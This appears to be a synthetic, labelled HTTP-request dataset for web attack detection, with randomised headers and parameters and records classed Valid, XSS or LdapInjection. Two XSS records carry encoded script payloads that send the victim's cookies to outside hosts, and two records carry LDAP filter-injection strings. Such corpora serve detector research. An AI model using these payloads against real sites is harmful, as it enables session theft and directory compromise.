Upgrade: r85mm/0.1
Warning: 294 www.tpriIw.html "evdBEd" 
X-Forwarded-For: 130.166.17.51
X-Serial-Number: 1101244
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8579
Start - Id: 33449
class: Valid
POST /d0NIqIjUa9n8/d6tia/yenmii9yrleaocotae/rMjmngU14mbylofnAb0R/clOeht5xdtAhgsInehe/ltziroer9naNaAeTfnx.jsp? HTTP/1.0
Content-Length: 268
Content-Language: et9aahnE
Content-Encoding: deflate
Content-Location: http://www.utadi.st/b1oU/cQbetl/ribp/nzhxden.jpg
Content-MD5: dDZlZXNmd3JubHR5VXBTbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 Jan 05 04:23:39 UTC
Last-Modified: Tue, 28 Apr 09 23:41:22 CET
Host: 24.4.11.220
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 23.36.219.53
Cookie: orbeoolweatxoy=1lc8;zbeo=uCuImo3;3d@orXnodecmdD6E=07;mm=310442
Cookie2: $Version="6"
Date: Sat, 06 Mar 10 17:14:01 UTC
ETag: "OBRpOLDexlTKNOercvA"
Expect: 100-continue
From: rypkuF@annazi.gov
If-Modified-Since: Mon, 02 Apr 07 17:29:19 UTC
If-Unmodified-Since: Sun, 06 Feb 05 03:08:49 GMT
If-Match: *
If-None-Match: "3NtIwBNUmy_QDfn."
If-Range: Wed, 26 Jul 06 01:29:39 CET
Max-Forwards: 14
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic cnRjZW86bnNucmZu
Authorization: edtq mouo=tnrAmd
Range: 6-,-8,-324
Referer: /Tssit7/ieethee/Vecl/sr2h7nfn/pscsndt.php
TE: chunked,trailers,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/2.0 (Machintosh; U; PPC 0.0; yi-tn; rv:1.6.9) Gecko/18455452
UA-CPU: StrongARM
UA-Disp: 9739,949,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 669x659
Via: 6.7 69.245.121.118:33, 9.8 218.72.226.66, FTP/5.7 37.159.91.134
Transfer-Encoding: pecEt; vptce=lhetsebe
Upgrade: encr/4.7, csRuef/7.1, ee6/1.4, tehaa/9.8, 7en/7.5
Warning: 657 165.58.231.168 "oeofT8kteyMTk0" 
X-Forwarded-For: 24.33.216.151
X-Serial-Number: 944908095975390
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

ranHeumnpk=2707963426&N7g1nae==s23rna Mss&Lsentn=Inraxtermdfdincludeeef?s&ooE0dtesoez=ePlxx-w&dpi=hofHk&hit=5&NZdivx.Q=gxOMA4Ana_7&yTcaE=jubaB&lfromiKhaN=cW9&hO6TfuFgL=sys7&i9nqe=weiAqbe6n2s2icn&2ynceooona=eBklaKzI&wlae1thdrudfeFe=eservices9sdoh0Nt&hX8E=64&hcjc=65

End - Id: 33449
Start - Id: 28020
class: Valid
GET /dWVTSpFtN/5vl7pzl@WnwN3u_9/kYYmChg/rkr8txBfJj/53iuggsoTeorj.js?laaIgm=aonmhl%25ne%2FHdaequmMo&zreplace.TQQSv=t&islessrq9c5vSo=4 HTTP/1.1
Host: 166.47.52.198
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: 7Q6ia4e-gdyddeiP, 8hyeAcxg-rvndnif;q=0.5
Cache-Control: no-cache
Client-ip: 188.7.31.94
Cookie: eI=ds;ris=dt8yupdateledz3ossAor;dyceh0fifo=vcopyut;lO4ls6ghaact=r
Cookie2: $Version="9"
Date: Sun, 18 Mar 07 12:09:23 GMT
ETag: "lczTiIcIZiFK5dSs"
Expect: 100-continue
From: gnfoD3ti@acjf.biz
If-Modified-Since: Tue, 05 Aug 08 14:13:54 CET
If-Unmodified-Since: Thu, 14 Dec 06 10:52:22 GMT
If-Match: "hUMn9o0GuouF8yJi"
If-None-Match: "kW_AC5eSXvX_mO7ea1-t"
If-Range: "cb6HzexG9Y_@GeX4x5"
Max-Forwards: 9086
MIME-Version: 9.3
Pragma: tqro7=cp
Proxy-Authorization: NTLM QTRjYWFhd3RhNHlnT2l0aWNvaWkxc3JoVG9ndGFhaWRscjhySGF0aG90
Authorization: uqd1da truUi=h5nc
Range: 423138-8,594351-,3-756362
Referer: http://YinOid.cz/imahos/itrAte/z3db/Hd4ooa.cgi
TE: deflate,chunked,trailers
Trailer: Max-Forwards
User-Agent: dgad (kk-Awzn2; 80l1v0)
UA-CPU: x86
UA-Disp: 6297,097,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4477x7117
Via: 7.5 102.49.110.164, FTP/0.3 239.41.226.72, ldar/8.0 www.tnctuuai.png
Transfer-Encoding: emot3
Upgrade: 9htud/6.5, uadanh/4.9, euxd/5.9
Warning: 759 www.rcgyueh.tiff:5 "wolidasoknadsaeahf" "Sun, 27 Jul 08 14:28:37 UTC"
X-Forwarded-For: 83.205.211.13
X-Serial-Number: 45504056220
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28020
Start - Id: 1401
class: Valid
GET /7I/txrcp1/y41oj7xAPpckrk7z4/t37Ej/nemliicItet8d2eeHo/oYjh/_jAglNwFKb/mHOw_xv2-XqxU_W0/yWTDCPxmM/rI_rEJ/ZuwhereOE/05utM66.php?5codoae=2echTwc&3aS78esytrg7yye=etj&pj6ner9=%29%3Fi&iJ=932354&sn=asoetcdeoaa%2FNxEg+&aIsm1au=lena&fdiSmdsesn8=39910115&xatsearyzt=cUinhoxdddlbgsoundhtpassas HTTP/1.1
Host: 18.120.71.121
Connection: eEuado
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: 5efc-x;q=0.2, MrooeCsn-fsrhaaq;q=0.8, teerh-lae, asetwih-abfdl, esttrfi-snftanu
Cache-Control: max-age=84256
Client-ip: 234.54.80.228
Cookie: 66ePusrY-ou=ejqC
Cookie2: $Version="08"
Date: Fri, 28 Dec 07 08:08:16 UTC
ETag: W/"EzbiYuN8PW38Neaol2"
Expect: sAhilet=ojifI;aEeoeots
From: aihr@oos5lle.org
If-Modified-Since: Fri, 21 Aug 09 08:19:10 UTC
If-Unmodified-Since: Fri, 26 Oct 07 07:59:09 CET
If-Match: "0PrVauYlx-_TFUC1-g"
If-None-Match: *
If-Range: *
Max-Forwards: 430
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: aibtn 4neurc=oeOocv8e
Authorization: Basic N2Q0ZDp0dW90czRpYQ==
Range: 23171-440
Referer: /llit.pl
TE: gzip;q=0.9
Trailer: Proxy-Authorization
User-Agent: aadeet7ctlrajAlyrae
UA-CPU: PowerPC
UA-Disp: 556,8289,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 238x900
Via: nror/1.7 www.vTl8yg.tiff, HTTP/6.7 163.67.18.86:23
Transfer-Encoding: oomc; ueola5s=ala1ew8a
Upgrade: hwleo/8.7, hrph/7.2, dnoxhi/9.3
Warning: 832 12.107.153.6 "o9em3ihrbeRs" 
X-Forwarded-For: 166.217.103.151
X-Serial-Number: 8811258803232
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1401
Start - Id: 24403
class: Valid
GET /tDooTAxkaX2Cfk_9/j5Atf/heTCoDv3yd/@bXwrmYi_/rpqOG4x/t6PmiMus/bosbleirhrtrtkeaa/hD/scriptlPYF@_/tgehfhte.dll?96hUQtmp3JbyT=e&K6_kKpasswd@euhttpsvX=%2F9e&ftpCWr2ahwindow.openhFk=qee&aa=e5tsu3ja8ecsa&js=caa&asgOae5=1319&baaRenxiS=eafSqc8pispgk1&iqeccisofi=928&teAdTs=aSir3shstp&jUYngnWwindow.open=38612&lioYt=88aumll HTTP/1.0
Host: www.6lubndz.com
Connection: hoeeow4a
Accept: video/mpeg;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 181.101.138.119
Cookie: n7Ceom=5uxmwvQ3Rj;it3sohns8=dR;e5ifohEb8iTosli=sN_dLYp;asn8u3ba6ldo2n=eeowp-;ouy=h i
Cookie2: $Version="260"
Date: Sat, 16 Jul 05 15:51:40 GMT
ETag: "V1Ukz5yUSE9xeel"
Expect: eteE=tafpap;tisoyAto=6ifg7
From: e8g1@ha9sec5.ch
If-Modified-Since: Tue, 26 Jan 10 05:54:48 UTC
If-Unmodified-Since: Thu, 02 Nov 06 21:52:22 GMT
If-Match: *
If-None-Match: "9WP84YsxYwUb8_hGHA"
If-Range: Thu, 03 Feb 05 11:55:56 CET
Max-Forwards: 1
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest response="03f5CBdFe1b3b7aFaCeAB191f27Fe5e8"
Authorization: rrtgwo dpLnewri=wwNr
Range: 4584-
Referer: http://www.eeil.be/uEohusEr/853Tem/oase.gz
TE: trailers
Trailer: Host
User-Agent: 2elqngs7/0.9.3.5
UA-CPU: MIPS
UA-Disp: 801,8735,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1274x3966
Via: FTP/2.8 www.apeAYu.gif, 4.2 133.224.22.121
Transfer-Encoding: nmlx; esptgh=acSlit4a
Upgrade: bf6/1.0, t7Oteo/2.2, sdo/9.0, olyo2o/7.4, ivryva/4.0
Warning: 469 www.tdcl.js "anew82tiB4Desxdnh" "Thu, 02 Oct 08 03:59:00 CET"
X-Forwarded-For: 231.128.57.40
X-Serial-Number: 881526835
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24403
Start - Id: 47425
class: XSS
GET /uQmzbxIGtkD-y1/2G0__UyZ/ftqR9eC7cB/n5JCID4e/rhenirssmes/jTGI@alz/nctHfrYz67/@0Hym9jew-/3ecayetanqi9Taag/ee7XU0.wv8e/ya93hdfshr85isEi/aB0zk._bEwG.bin?eevl9raEhtsa=eycrshmEmxhTnC9&hAqdaoAuiThud=rsess&skusto=%26%3Cscript%3E%5Bwindow.open%28%27http%3A%2F%2F209.79.226.72%2Fme.asp%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E&Hre=79172&0siodhdOiseh1w=558&wuecoaDePr=g%27raa&0Y9Vaibxbsam6@=7&irhetqdrthH=9248 HTTP/1.0
Host: www.suml.de
Connection: close
Accept: image/jpeg;q=0.9, text/*, text/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 249.196.221.75
Cookie: NEnw=aDArv
Cookie2: $Version="704"
Date: Tue, 04 Apr 06 22:31:04 CET
ETag: "-iFBwmWA_GdAc95F"
Expect: bnh5u=ermwt
From: 0hOsn@ivHe.ch
If-Modified-Since: Mon, 07 Jun 04 16:46:42 GMT
If-Unmodified-Since: Mon, 02 Mar 09 19:42:28 CET
If-Match: "fAotQn9HD5zXLM1Joc8"
If-None-Match: *
If-Range: Sat, 21 Oct 06 22:13:07 GMT
Max-Forwards: 219
MIME-Version: 4.4
Pragma: eann=bnsn
Proxy-Authorization: Basic ZVJkN2g6b2FsMw==
Authorization: esld7o x0tYpldt=7vahim
Range: 40-52491,810751-,61626-565636
Referer: http://www.gshemtn.gov/weri/mioax/Issrna/gayxeses/uqEt.asp
TE: trailers
Trailer: Pragma
User-Agent: a.x4wem http://www.Fanasge.org
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: HTTP/7.1 www.hu7sius.htm:05546, 8.0 www.Ea7avfeT.jpeg:83179, HTTP/5.0 1.111.175.172
Transfer-Encoding: ktgct
Upgrade: tWh08/9.4, ars/6.0, sar/0.0, eed/7.2, te3n/6.1
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 168.182.251.139
X-Serial-Number: 79894871032971877602
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47425
Start - Id: 1729
class: Valid
GET /rWXCngkoy4P25/6rgrkubDs6RpedSeiw/iNeymrqsMNo/vjvs8bGmoM/rgaemmnoty/nlv9se2etb/l630EiSlIE-qne/svesenaeo.gif?yfrrulr=%3D%24na+1t%3Cdtcih%3Frrt&clDssyt=sKyzzmilS&yMpTejeeiraie=8736&FEZ.NVuPAXn.=documentbu6nae&i96lSweOYe=5157&rebcAe1aHcnyci=psi60l0gs++&opmzkIf1nserE81=22600&mPa=Dvvcnullbnia9p&c0celqtu=egaa%25c HTTP/1.0
Host: www.AfoH.fr:80
Connection: lctltsae
Accept: image/jpeg
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 109.240.50.123
Cookie: AtiaSalG1nileq=3;3mdusx2=Eerwgtaeb;aiotmiadetyu=bDh;ba3TavAuhz=ienedgh5aphi;qqxscnu0n7rBse=3Cpol;rtnTcear=83
Cookie2: $Version="377"
Date: Fri, 24 Mar 06 04:08:27 GMT
ETag: W/"L7f1sN7yyH1pr8.R"
Expect: 100-continue
From: fnit@shs9u.fr
If-Modified-Since: Sat, 11 Sep 04 12:58:10 UTC
If-Unmodified-Since: Fri, 09 Sep 05 19:08:48 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Jan 05 18:05:04 UTC
Max-Forwards: 7847
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: eahnhs rr6D=telemrl
Authorization: Digest response="dc37d7B1B6d9eDF5ea84FFFFdfEDedb6"
Range: -37,450406-
Referer: http://www.9noc.be/cOhmrauw/8aetben/nDed/tilm.pl
TE: deflate;q=0.1,deflate
Trailer: If-Match
User-Agent: Mozilla/4.0 (X11; U; SunOS sun4u 4.1; c9-eT; rv:1.0.6) Gecko/92477241
UA-CPU: PowerPC
UA-Disp: 6638,4343,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6206x0801
Via: 3.2 233.150.129.172, 6.6 www.ihitp.shtml
Transfer-Encoding: identity
Upgrade: ejodco/1.2, nnhlf/2.2, sht/7.3, 6nmn/0.5, neetes/1.7
Warning: 145 www.Iehgiho.html "wrbmde7w6d7Oeekrmc" 
X-Forwarded-For: 102.24.89.42
X-Serial-Number: 2051248263385180014
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1729
Start - Id: 16682
class: Valid
GET /hN0AoC2/osIsessnttne9dcnHet/tihqnbzrhawr/ypd@@D@BVPXO6MPA6uEY/4x2oh0miiodvltN/eZhFebakLob/htgt7aosIsb/cLvSXU.wsk2/0h-Sf9miqS.php3?haeuanhjxsore=fptssOaahktahmeesf&Favds2hiwsfod=dhitoa&rneuObirIiwph=3&9kg8=474458655&gnitnO0=gT%25zd%3Ftst HTTP/1.1
Host: www.erteae.org
Connection: txBe5
Accept: application/*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: tu6nsw-sachhy;q=0.9
Cache-Control: no-cache
Client-ip: 124.24.127.56
Cookie: deletepcPK=S=;4oDashukzektK3=73171;sz63Setc86=9i1w_vvvXhv4;lnvOuglsrhqcmE=v;8Drxbx@Ex=3262;sreAetkfdehSe=saEa5 
Cookie2: $Version="672"
Date: Sat, 06 Sep 08 16:49:47 CET
ETag: "B1pwQY0mt0Vcypg@Iil"
Expect: 100-continue
From: noedlreb@rlhth.be
If-Modified-Since: Wed, 02 Jun 04 15:40:11 CET
If-Unmodified-Since: Fri, 12 Dec 08 05:20:35 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 19 May 06 13:16:07 GMT
Max-Forwards: 116
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic ZXVUV3A6c29iYXJyZU8=
Authorization: Basic c2FtZHNlOmxjc3BhbjVt
Range: 251-5
Referer: /e9o11/6Tatwue/seem.mspx
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.3 (compatible; Konqueror/6.1; Linux i386; sDwphrlec)
UA-CPU: 68000
UA-Disp: 3868,713,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6609x7402
Via: 0.0 www.ictAst.tiff
Transfer-Encoding: gzip
Upgrade: topnf/0.4, nils/4.5
Warning: 433 www.lsruibo.js "n4idus" 
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 93584003458
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16682
Start - Id: 7224
class: Valid
PUT /wQtrnwnorie/xz.exe? HTTP/1.0
Content-Length: 199
Content-Language: as
Content-Encoding: compress
Content-Location: /crtnpElb/EAueset.js
Content-MD5: dmx0YXJlbGxuNHNoTG1ldw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 13 Jul 07 24:40:17 GMT
Last-Modified: Thu, 02 Nov 06 11:50:40 GMT
Host: 156.148.184.140
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: tbBep-8l, kvh-oxe, 6tey-c;q=0.5, o-ozuse;q=0.2
Cache-Control: no-transform
Client-ip: 83.132.90.202
Cookie: Erd=uh-g;odeovG=e8+bgsound;4HobetweenVxB=|beihmsofroma;vsamsceaeosU=srat6psewlen=@a%
Cookie2: $Version="27"
Date: Mon, 03 Jul 06 23:12:13 UTC
ETag: W/"CXAljVW.aYONgno@TIm"
Expect: rri96osu
From: 9End@aiod4fee.uk
If-Modified-Since: Fri, 18 Dec 09 08:27:08 CET
If-Unmodified-Since: Mon, 15 Mar 04 17:24:02 UTC
If-Match: *
If-None-Match: "XfVq3qNuQ9TJ7lqIs"
If-Range: *
Max-Forwards: 594
MIME-Version: 6.6
Pragma: w=sCosh6
Proxy-Authorization: NTLM aHN3NHJ6aXRlc3RlaW9zdGliaHZlbnVvY29vb2VuOWFrQTVzbnhjbnNobnYw
Authorization: nlt3Oh 8issjt=tyseo
Range: 7717-
Referer: /loatc/OEecbath/7sf5/osSr/qxn5e.tiff
TE: trailers,trailers,chunked;q=0.3
Trailer: Range
User-Agent: Mozilla/6.4 (Windows; U; Win 9x 5.5; 6t-dW; rv:8.0.2) Gecko/66493807
UA-CPU: 68000
UA-Disp: 5578,6674,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 629x010
Via: HTTP/6.7 74.155.138.253:415, 4.5 140.140.169.177
Transfer-Encoding: gzip
Upgrade: qtiUn/4.0, erx/6.5, 6el/5.2, CbtgHd/4.1, eolItq/5.0
Warning: 676 www.hooAenjp.htm:218 "aqnEtosob2" 
X-Forwarded-For: 94.164.69.87
X-Serial-Number: 35067124458
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lhc='bia&FWOM3d3Z8=xe4ec&see6ttetn=eLOUe7fHuM&r1oststBsi=295634&unoeMylaeaoroeh=eu3ufsse&3gecd3e=na cnreplacektt~e&4l7fbtn2lnn2= n|t&nmntotei=677242&iJa5kRplrdroniy=taInhoeafvnl s&SojtzagY=5437

End - Id: 7224
Start - Id: 47498
class: XSS
GET /wZT1E1OKSL38T/EvtkGqc/iZFS8_nFsLIie48fpZbB/ntlem5if7/9aecystsLtoban4ad/cY3AFMGQmMOU/gsgayYe6osayh/sSz.E5WqTsM0_bA/s6B3f.html?4hgzysawtbzth=%5B%5CxC0%5D%5B%5CxBC%5Dscript++++%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.tolelast.com%2Fcgi-bin%2Fmall.cgi%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript++++%3E&0gadne=8su&soymttkenn=0844470&xIKOyB=eaT4-&46aiOn=%27iuhtt8ds&opQ1wwA6ct=s%7CZaahw%2Beisotc&egbE=lmYAhCK16y HTTP/1.1
Host: 128.22.155.165:80
Connection: keep-alive
Accept: image/*
Accept-Charset: koi8;q=0.2, x-mac-japanese, windows-1257, utf-8
Accept-Encoding: *
Accept-Language: aohO0e-hyahhpU;q=0.8, D4nk-head;q=0.4
Cache-Control: no-cache
Client-ip: 229.228.100.156
Cookie: emahgsdcedinet=ohemi;nzehhatapl=305098573
Cookie2: $Version="037"
Date: Sat, 03 Mar 07 07:34:22 GMT
ETag: W/"mH_4FRfD3DPEqxMbE"
Expect: 100-continue
From: hD4h@iejie.gov
If-Modified-Since: Fri, 21 Jan 05 04:30:17 GMT
If-Unmodified-Since: Tue, 05 May 09 21:21:18 GMT
If-Match: *
If-None-Match: "psPV2ruvNNT45x2-w"
If-Range: Thu, 24 Sep 09 10:13:13 UTC
Max-Forwards: 34
MIME-Version: 4.9
Pragma: 3ssheB='nan'
Proxy-Authorization: Basic aXJvZXA6Y3NlYWFyYg==
Authorization: NTLM aWVxcDJhdDdkc2RhZWVkaFM3YTBkeW5sZmc5bG1wcHl1RWlvZW9tc25sZQ==
Range: 9183-933,-0
Referer: /rbIhrRs/t4osweo/Orcpl8.asmx
TE: trailers,trailers
Trailer: Authorization
User-Agent: o@umG1 http://www.wooXien.it
UA-CPU: x86
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7841x155
Via: fnAhun/6.5 www.eh33mol.gif, HTTP/2.4 www.hI34iv.png, 0.2 171.144.220.41
Transfer-Encoding: gzip
Upgrade: mrsd/9.5, owur/3.3
Warning: 771 227.153.234.137 "zyfairhnrumgfhbhiV" "Thu, 01 Jan 09 02:19:05 CET"
X-Forwarded-For: 121.171.235.172
X-Serial-Number: 48112496441051
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47498
Start - Id: 29870
class: Valid
GET /e-Atl-p-x/ghYehrit0t/ec/ewh/dX8D.iaP6oXhD7nJ.mspx?ijeahi=etperl&aT=855731&nsanDomefie=zu9+fpassthruinidbbnpt%3A&oNm=ifa4nB37&MnodeyFF5idW=iin&tns2=8&anttotaosndt2q=locations%5D&eeNTupe=r4plAR HTTP/1.1
Host: www.fernlvirw.com
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: lq1t=nesee
Client-ip: 192.8.187.37
Cookie: axstnn=ofIeGLX6Nj7Z;il6pml0q=ceuvgBgsatc;d0rk9irqbe=67488377;hnt=053;E2ga4uat6t=r43positionra49mpon;g3Wh=dbrWK2-YRb
Cookie2: $Version="92"
Date: Tue, 08 Jan 08 12:47:27 GMT
ETag: W/"_IjatwEpMy_E.-i5EQ_n"
Expect: ermu
From: hggtsom6@ieylr.uk
If-Modified-Since: Tue, 17 Aug 04 04:28:00 CET
If-Unmodified-Since: Thu, 25 Mar 10 10:54:50 UTC
If-Match: *
If-None-Match: "GjkUPWhH.jAqOGL"
If-Range: *
Max-Forwards: 58
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest response="45DcFe932F9403C0A2bd6e0bCfDd5a07"
Authorization: Basic YW5zdnV0YTpjb1JhOXE=
Range: 955167-75,390-,1-
Referer: http://www.tds2d.de/oeueckh/aocxik.cfm
TE: gzip
Trailer: Via
User-Agent: Mozilla/2.3 (compatible; etmrnidd; Win98; bmia)
UA-CPU: StrongARM
UA-Disp: 724,467,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 952x914
Via: 2.9 19.111.183.191
Transfer-Encoding: identity
Upgrade: an1xa/7.5, saltfi/7.3, Yri8/0.3, y6siea/3.9, snse/6.7
Warning: 570 101.76.63.64 "qhHehxa5pope" 
X-Forwarded-For: 255.72.182.148
X-Serial-Number: 82258082988548
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 29870
Start - Id: 37429
class: LdapInjection
GET /oD78WNtTouVbbzsXw1D/r-Bnst8ZbYI/sCTpfM9ln/oklLy8H_FDvnDsB.q/n-o/npvx8Falx3iZ5ypN/meFS_WHJsEZcgGnR7OL/si_lnIYL1r-1YhagV/eegcr.js?ufiodamfoh3=39&ran1ea8exsdgev=jbs+ms%2BwLyamCoa+bexec&iranec=qA15h9f-US&rboerroe9lseka=eao8p HTTP/1.1
Host: 82.209.132.23:98515
Connection: keep-alive
Accept: video/quicktime, application/zip;q=0.2
Accept-Charset: x-mac-arabic;q=0.4, x-mac-hebrew, cp-932;q=0.9, x-mac-roman;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 52.162.191.12
Cookie: e8xa=oZsgnsiuVJBm;umlhXL=) ( | (   cn=*o  'brien*    )(mail =*o'brien*   );iInNoo=1806454062
Cookie2: $Version="8"
Date: Sun, 17 Apr 05 22:46:24 GMT
ETag: W/"AaCc-4-zIryMfCp-2Un"
Expect: sqy5tht=eBtr
From: iniarr@ae8ees.st
If-Modified-Since: Sun, 02 Nov 08 13:46:12 GMT
If-Unmodified-Since: Mon, 30 Aug 04 07:34:30 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 05 Nov 08 15:58:34 GMT
Max-Forwards: 4457
MIME-Version: 1.8
Pragma: eotka=8
Proxy-Authorization: Basic ZnNybE86b3NzcmRl
Authorization: Digest qop=auth
Range: 7-824579
Referer: http://www.aisIO.uk/frlY/c5uj6l/tael/hdYsa/ectoApar.jpg
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.6 (Windows; U; Win 9x 1.0; rd-1a; rv:0.3.8) Gecko/76905559
UA-CPU: Sparc
UA-Disp: 1171,1372,32
UA-OS: Windows NT
UA-Pixels: 2354x7109
Via: HTTP/5.7 www.osrmLe.gif
Transfer-Encoding: deflate
Upgrade: tNlTm/0.9, cta8T/8.8, wwlEn/3.1, o9lne9/1.6, 2ee4Ai/5.8
Warning: 631 www.iErtre.shtml "1kti" 
X-Forwarded-For: 89.11.66.103
X-Serial-Number: 72751646141321636883
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37429
Start - Id: 37347
class: LdapInjection
GET /ig/revkoali9rtgatEll9co/k0l1QNVftp4Mk/pMSB1zGxS73/htKQ.jsp?nvtteZq=585522&scdhxe=iu2t&sestrr=6814&orsltosrs=httpsd+usr&e7tulUa=th%3Cq8nnolsaj8n&iu=%29zz+%2F&oeak3ontNnElo3=pdrrniawitin&37ep4asrs=na%2Fae%7EghW%3Btei&sSix=k78hEonjlogsomboot.iniEr9ao&wd=mltmp4%5D%5Bcf&3fCXuPstdinWz@O=22453759&snoiieahe1ased=%5Bribp%25tyninputSch&neooiTliXq=aimcEmtEafkA6rmu&twiwnste=isisiformweabgsoundeeah%25nwio%3F HTTP/1.0
Host: www.dlsfOE.it
Connection: close
Accept: */*
Accept-Charset: windows-1254;q=0.7, iso-8859-1;q=0.2
Accept-Encoding: )  ( | (0Ooet=afrcb*)
Accept-Language: *;q=0.2
Cache-Control: min-fresh=8050
Client-ip: 233.106.91.22
Cookie: tG5nox6phtpass_w='j;s4morFe=itQ;CsoirjDiEur=3436;5lia=encatdbgsoundlaEnAlhidvl;ehVt7hhetdcoao7=36259;NiyKSCvPwm=tteug3canlhC
Cookie2: $Version="578"
Date: Sun, 04 Mar 07 23:52:24 CET
ETag: W/"jek.LKiVan3LxCi7px"
Expect: tweTge
From: elbo@eieuetfntT.fr
If-Modified-Since: Mon, 14 Dec 09 24:20:20 GMT
If-Unmodified-Since: Sun, 13 Dec 09 07:37:48 CET
If-Match: "Qsk..eTd0e6CqY@ILtr"
If-None-Match: *
If-Range: Sat, 07 Jul 07 16:22:33 GMT
Max-Forwards: 121
MIME-Version: 7.2
Pragma: yee5u='Se'
Proxy-Authorization: Basic UG1sczU6eXJoaHVGbA==
Authorization: Digest cnonce="ee0V1qD"
Range: -04795,-66
Referer: http://ssEmal6e.net/jOeaarrg.fgf
TE: trailers,deflate,deflate;q=0.1
Trailer: Accept-Charset
User-Agent: mOn3wp/4.2.2
UA-CPU: x86
UA-Disp: 046,109,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 495x1616
Via: HTTP/4.7 www.rlhaes.tiff, aidr/6.7 www.qonp.html, HTTP/1.2 175.58.106.134
Transfer-Encoding: Teud; tiaT45i=tupnqodU
Upgrade: aya/9.4, ywdbiy/0.6, eeei/1.5, 7swLle/1.4, xtau0e/0.0
Warning: 830 www.ane2.html:1 "vjdynls" "Sun, 23 Nov 08 23:13:16 CET"
X-Forwarded-For: 87.44.238.73
X-Serial-Number: 62809596360588444587
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37347
Start - Id: 3811
class: Valid
GET /eiNtn/gxbewekaaeWhduew/N5v4pCDWa/eArgwoa9i/iGz/xJVYEIbetweendivLLA/d0Q/deletelike/bo4rtiat/ZuaidMptya8m1n/n7UDdV/Q6fP_A-optBHe.msf? HTTP/1.0
Host: www.aei5cjVOT.org
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: compress
Accept-Language: Oyte4A-lhcBrue;q=0.3, fnttdnXt-buK;q=0.4
Cache-Control: max-age=79665
Client-ip: 48.97.162.140
Cookie: wti1ae=5
Cookie2: $Version="78"
Date: Fri, 31 Oct 08 15:57:26 GMT
ETag: "RsA-tek8X-B8YNLx"
Expect: A02tfdi=rriige2
From: r0oAr@svheb.cz
If-Modified-Since: Sun, 11 Jun 06 22:49:51 GMT
If-Unmodified-Since: Sun, 03 Aug 08 12:59:27 GMT
If-Match: "tL@vXxpgtoVmd74Mgwse"
If-None-Match: *
If-Range: "CWwmUvNn5NwbpQe"
Max-Forwards: 6
MIME-Version: 9.6
